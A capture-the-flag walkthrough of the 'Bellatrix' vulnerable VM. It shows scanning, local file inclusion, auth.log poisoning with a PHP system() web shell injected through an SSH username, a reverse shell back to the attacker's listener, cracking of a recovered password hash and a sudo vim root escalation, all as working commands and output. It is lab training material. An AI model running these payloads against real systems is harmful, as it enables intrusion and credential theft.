Howarts: Bellatrix
First of all port scanning withnmapor you can use recon to save extra time and continue with your other tasks
┌──(root@ghost)-[/home/ghost]
└─# recon bellatrix.vuln
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Cyberapocalypse 2022 whoohoo !
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-10 21:20 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:20
Completed NSE at 21:20, 0.00s elapsed
Initiating ARP Ping Scan at 21:20
Scanning bellatrix.vuln (10.0.2.4) [1 port]
Completed ARP Ping Scan at 21:20, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:20
Scanning bellatrix.vuln (10.0.2.4) [65535 ports]
Discovered open port 22/tcp on 10.0.2.4
Discovered open port 80/tcp on 10.0.2.4
Completed SYN Stealth Scan at 21:20, 1.39s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.4.
Initiating NSE at 21:20
Completed NSE at 21:20, 0.00s elapsed
Nmap scan report for bellatrix.vuln (10.0.2.4)
Host is up (0.000061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:FB:D3:69 (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 21:20
Completed NSE at 21:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[+] [fuzzin server]
http://bellatrix.vuln [200 OK] Apache[2.4.46], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.46 (Ubuntu)], IP[10.0.2.4], Title[AvadaKedavra]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Jul 10 21:20:21 2022
URL_BASE: http://bellatrix.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://bellatrix.vuln:80/ ----
+ http://bellatrix.vuln:80/index.php (CODE:200|SIZE:1728)
+ http://bellatrix.vuln:80/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Sun Jul 10 21:20:22 2022
DOWNLOADED: 4612 - FOUND: 2Okay so we have two tcp open ports, 22 for ssh, 80 for the http web server and our fuzzer found two urls. Lets curl the site to see what happen
┌──(root@ghost)-[/home/ghost]
└─# curl "http://bellatrix.vuln/index.php"
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack</p>
<p>ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack.php</p>
<!--
Nah...this time there are no clues in the source code ...
o yeah, maybe I've already told you a directory .php? :)
-->
/*
$file = $_GET['file'];
if(isset($file))
{
include("$file");
}
*/
At this point we have two 'hints', things seems very clear if you have a basic knowledge about PHP and LFI, so let's give a try
┌──(root@ghost)-[/home/ghost]
└─# curl "http://bellatrix.vuln/ikilledsiriusblack.php?file=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:118:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:113:120:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:114:121:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:115:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
whoopsie:x:119:125::/nonexistent:/bin/false
colord:x:120:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
sssd:x:121:127:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
geoclue:x:122:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
hplip:x:124:7:HPLIP system user,,,:/run/hplip:/bin/false
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
bellatrix:x:1000:1000:Bellatrix,,,:/home/bellatrix:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:127:65534::/run/sshd:/usr/sbin/nologin
lestrange:x:1001:1001::/home/lestrange:/bin/rbash
For additional information gatering you can use lfienum
┌──(root@ghost)-[/home/ghost]
└─# lfienum.py "http://bellatrix.vuln/ikilledsiriusblack.php?file="
[+] [LFI VULNERABLE] http://bellatrix.vuln/ikilledsiriusblack.php?file=/var/log/auth.log
Jul 7 20:05:03 bellatrix CRON[760]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:05:03 bellatrix CRON[760]: pam_unix(cron:session): session closed for user root
Jul 7 20:05:04 bellatrix systemd-logind[764]: New seat seat0.
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event0 (Power Button)
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event1 (Sleep Button)
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Jul 7 20:05:04 bellatrix gdm-launch-environment]: pam_unix(gdm-launch-environment:session): session opened for user gdm by (uid=0)
Jul 7 20:05:04 bellatrix systemd-logind[764]: New session c1 of user gdm.
Jul 7 20:05:04 bellatrix systemd: pam_unix(systemd-user:session): session opened for user gdm by (uid=0)
Jul 7 20:05:06 bellatrix polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.43 [/usr/bin/gnome-shell], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale es_ES.UTF-8)
Jul 7 20:05:07 bellatrix realmd[1131]: Loaded settings from: /usr/lib/realmd/realmd-defaults.conf /usr/lib/realmd/realmd-distro.conf
Jul 7 20:05:07 bellatrix realmd[1131]: holding daemon: startup
Jul 7 20:05:07 bellatrix realmd[1131]: starting service
Jul 7 20:05:07 bellatrix realmd[1131]: connected to bus
Jul 7 20:05:07 bellatrix realmd[1131]: GLib-GIO: _g_io_module_get_default: Found default implementation local (GLocalVfs) for ‘gio-vfs’
Jul 7 20:05:07 bellatrix realmd[1131]: released daemon: startup
Jul 7 20:05:07 bellatrix realmd[1131]: claimed name on bus: org.freedesktop.realmd
Jul 7 20:05:29 bellatrix dbus-daemon[485]: [system] Failed to activate service 'org.bluez': timed out (service_start_timeout=25000ms)
Jul 7 20:06:09 bellatrix realmd[1131]: quitting realmd service after timeout
Jul 7 20:06:09 bellatrix realmd[1131]: stopping service
Jul 7 20:09:01 bellatrix CRON[1759]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:09:01 bellatrix CRON[1759]: pam_unix(cron:session): session closed for user root
Jul 7 20:16:12 bellatrix sshd[2008]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=bellatrix
Jul 7 20:16:14 bellatrix sshd[2008]: Failed password for bellatrix from 10.0.2.15 port 45040 ssh2
Jul 7 20:16:17 bellatrix sshd[2008]: Connection closed by authenticating user bellatrix 10.0.2.15 port 45040 [preauth]
Jul 7 20:17:01 bellatrix CRON[2012]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:17:01 bellatrix CRON[2012]: pam_unix(cron:session): session closed for user root
Jul 7 20:19:51 bellatrix sshd[2016]: Received disconnect from 10.0.2.15 port 45042:11: Bye Bye [preauth]
Jul 7 20:19:51 bellatrix sshd[2016]: Disconnected from authenticating user lestrange 10.0.2.15 port 45042 [preauth]
Jul 7 20:19:51 bellatrix sshd[2019]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2018]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2020]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2021]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
As we can see /var/log/auth.log is readable we should check if the file is writeable too and then lfi to rce by poisoning some log. In this case auth.log is poisoneable.
I made this PoC some time ago to automate the process lfi2rce
┌──(root@ghost)-[/home/ghost]
└─# lfi2rce.py "http://bellatrix.vuln/ikilledsiriusblack.php?file=" ssh 10.0.2.15 1337
lfi2rce ~by 0bfxgh0st*
Poison /var/log/auth.log
The authenticity of host 'bellatrix.vuln (10.0.2.4)' can't be established.
ED25519 key fingerprint is SHA256:I0jhHaNqig++DYBtm243KP9Od4nR7aTAqEzApdpuNxo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bellatrix.vuln' (ED25519) to the list of known hosts.
<?php system($_GET["cmd"]); ?>@bellatrix.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@bellatrix.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@bellatrix.vuln's password:
<?php system($_GET["cmd"]); ?>@bellatrix.vuln: Permission denied (publickey,password).
[+] Sending payload
listening on [any] 1337 ...
Jul 7 20:05:03 bellatrix CRON[760]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:05:03 bellatrix CRON[760]: pam_unix(cron:session): session closed for user root
Jul 7 20:05:04 bellatrix systemd-logind[764]: New seat seat0.
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event0 (Power Button)
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event1 (Sleep Button)
Jul 7 20:05:04 bellatrix systemd-logind[764]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Jul 7 20:05:04 bellatrix gdm-launch-environment]: pam_unix(gdm-launch-environment:session): session opened for user gdm by (uid=0)
Jul 7 20:05:04 bellatrix systemd-logind[764]: New session c1 of user gdm.
Jul 7 20:05:04 bellatrix systemd: pam_unix(systemd-user:session): session opened for user gdm by (uid=0)
Jul 7 20:05:06 bellatrix polkitd(authority=local): Registered Authentication Agent for unix-session:c1 (system bus name :1.43 [/usr/bin/gnome-shell], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale es_ES.UTF-8)
Jul 7 20:05:07 bellatrix realmd[1131]: Loaded settings from: /usr/lib/realmd/realmd-defaults.conf /usr/lib/realmd/realmd-distro.conf
Jul 7 20:05:07 bellatrix realmd[1131]: holding daemon: startup
Jul 7 20:05:07 bellatrix realmd[1131]: starting service
Jul 7 20:05:07 bellatrix realmd[1131]: connected to bus
Jul 7 20:05:07 bellatrix realmd[1131]: GLib-GIO: _g_io_module_get_default: Found default implementation local (GLocalVfs) for ‘gio-vfs’
Jul 7 20:05:07 bellatrix realmd[1131]: released daemon: startup
Jul 7 20:05:07 bellatrix realmd[1131]: claimed name on bus: org.freedesktop.realmd
Jul 7 20:05:29 bellatrix dbus-daemon[485]: [system] Failed to activate service 'org.bluez': timed out (service_start_timeout=25000ms)
Jul 7 20:06:09 bellatrix realmd[1131]: quitting realmd service after timeout
Jul 7 20:06:09 bellatrix realmd[1131]: stopping service
Jul 7 20:09:01 bellatrix CRON[1759]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:09:01 bellatrix CRON[1759]: pam_unix(cron:session): session closed for user root
Jul 7 20:16:12 bellatrix sshd[2008]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=bellatrix
Jul 7 20:16:14 bellatrix sshd[2008]: Failed password for bellatrix from 10.0.2.15 port 45040 ssh2
Jul 7 20:16:17 bellatrix sshd[2008]: Connection closed by authenticating user bellatrix 10.0.2.15 port 45040 [preauth]
Jul 7 20:17:01 bellatrix CRON[2012]: pam_unix(cron:session): session opened for user root by (uid=0)
Jul 7 20:17:01 bellatrix CRON[2012]: pam_unix(cron:session): session closed for user root
Jul 7 20:19:51 bellatrix sshd[2016]: Received disconnect from 10.0.2.15 port 45042:11: Bye Bye [preauth]
Jul 7 20:19:51 bellatrix sshd[2016]: Disconnected from authenticating user lestrange 10.0.2.15 port 45042 [preauth]
Jul 7 20:19:51 bellatrix sshd[2019]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2018]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2020]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:51 bellatrix sshd[2021]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=10.0.2.15 user=lestrange
Jul 7 20:19:54 bellatrix sshd[2019]: Failed password for lestrange from 10.0.2.15 port 45046 ssh2
Jul 7 20:19:54 bellatrix sshd[2020]: Failed password for lestrange from 10.0.2.15 port 45048 ssh2
Jul 7 20:19:54 bellatrix sshd[2018]: Failed password for lestrange from 10.0.2.15 port 45044 ssh2
www-data@bellatrix:/var/www/html$ ls -la
ls -la
total 732
drwxr-xr-x 3 root root 4096 Nov 28 2020 .
drwxr-xr-x 3 root root 4096 Nov 28 2020 ..
-rw-rw-r-- 1 bellatrix bellatrix 728806 Nov 27 2020 1c19c879fe8ef134c3e051c2d69c0c66.gif
drwxr-xr-x 2 root root 4096 Nov 28 2020 c2VjcmV0cw==
-rw-rw-r-- 1 bellatrix bellatrix 151 Nov 28 2020 ikilledsiriusblack.php
-rw-rw-r-- 1 bellatrix bellatrix 1728 Nov 28 2020 index.php
www-data@bellatrix:/var/www/html$ echo "c2VjcmV0cw==" | base64 -d
echo "c2VjcmV0cw==" | base64 -d
secretswww-data@bellatrix:/var/www/html$ cd c2VjcmV0cw==
cd c2VjcmV0cw==
www-data@bellatrix:/var/www/html/c2VjcmV0cw==$ ls -la
ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 28 2020 .
drwxr-xr-x 3 root root 4096 Nov 28 2020 ..
-rw-r--r-- 1 root root 1237 Nov 28 2020 .secret.dic
-rw-r--r-- 1 root root 117 Nov 28 2020 Swordofgryffindor
www-data@bellatrix:/var/www/html/c2VjcmV0cw==$ cat Swordofgryffindor
cat Swordofgryffindor
lestrange:$6$1eIjsdebFF9/rsXH$NajEfDYUP7p/sqHdyOIFwNnltiRPwIU0L14a8zyQIdRUlAomDNrnRjTPN5Y/WirDnwMn698kIA5CV8NLdyGiY0
www-data@bellatrix:/var/www/html/c2VjcmV0cw==$
At this point we have a dictionary and a salted-hashed user linux password, we can try bruteforce ssh login or simply break the hash with john
┌──(root@ghost)-[/home/ghost]
└─# jonh --wordlist=secret.dic hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateharrypotter (lestrange)
1g 0:00:00:00 DONE (2022-07-11 08:59) 5.263g/s 600.0p/s 600.0c/s 600.0C/s gryffondor..wingardiumleviosa
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We found valid credentials let's try to login ssh
┌──(root@ghost)-[/home/ghost]
└─# ssh lestrange@bellatrix.vuln
lestrange@bellatrix.vuln's password:
Welcome to Ubuntu 20.10 (GNU/Linux 5.8.0-29-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
38 actualizaciones se pueden instalar inmediatamente.
0 de estas actualizaciones son una actualización de seguridad.
Para ver estas actualizaciones adicionales ejecute: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife
New release '21.10' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Mon Jul 11 15:06:59 2022 from 10.0.2.15
lestrange@bellatrix:~$
At this point we can move through user folders to find user flag easily
lestrange@bellatrix:~$ cat /home/bellatrix/flag.txt
_____
/ \
/- (*) |*)\
|/\. _>/\|
\__/ |\
_| |_ \-/
/|\__|\ //
|/| |\\//
||| | ~'
||| __|
/_\| ||
\_/| ||
|7 |7
|| ||
|| ||
/\ \ \ fog
^^^^ ^^^
user: {69e0f71f25ece4351e4d73af430bec43}
Time to level up to root, let's check sudo -l
lestrange@bellatrix:~$ sudo -l
Coincidiendo entradas por defecto para lestrange en bellatrix:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario lestrange puede ejecutar los siguientes comandos en bellatrix:
(ALL : ALL) NOPASSWD: /usr/bin/vim
As we can see /usr/bin/vim can be executed as root, there is an easy way for this. Check gtfobins documentation or you can use gtfobins-webcrawler
[Sudo]
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo vim -c ':!/bin/sh'
lestrange@bellatrix:~$ sudo vim -c ':!/bin/sh'
# whoami
root
# ls -la /root/
total 56
drwx------ 7 root root 4096 nov 28 2020 .
drwxr-xr-x 20 root root 4096 nov 27 2020 ..
-rw------- 1 root root 1252 nov 28 2020 .bash_history
-rw-r--r-- 1 root root 3106 ago 14 2019 .bashrc
drwx------ 7 root root 4096 nov 28 2020 .cache
drwx------ 6 root root 4096 nov 27 2020 .config
drwx------ 3 root root 4096 nov 27 2020 .dbus
drwx------ 3 root root 4096 nov 27 2020 .local
-rw-r--r-- 1 root root 161 sep 16 2020 .profile
-rw-r--r-- 1 root root 680 nov 28 2020 root.txt
-rwxr-xr-x 1 root root 47 nov 28 2020 script.sh
-rw-r--r-- 1 root root 66 nov 28 2020 .selected_editor
drwxr-xr-x 3 root root 4096 nov 28 2020 snap
-rw------- 1 root root 806 nov 28 2020 .viminfo
# cat /root/root.txt
____ _ _ _ _
| _ \ | | | | | (_)
| |_) | ___| | | __ _| |_ _ __ ___ __
| _ < / _ \ | |/ _` | __| '__| \ \/ /
| |_) | __/ | | (_| | |_| | | |> <
|____/ \___|_|_|\__,_|\__|_| |_/_/\_\
_ _
| | | |
| | ___ ___| |_ _ __ __ _ _ __ __ _ ___
| | / _ \/ __| __| '__/ _` | '_ \ / _` |/ _ \
| |___| __/\__ \ |_| | | (_| | | | | (_| | __/
|______\___||___/\__|_| \__,_|_| |_|\__, |\___|
__/ |
|___/
root{ead5a85a11ba466011fced308d460a76}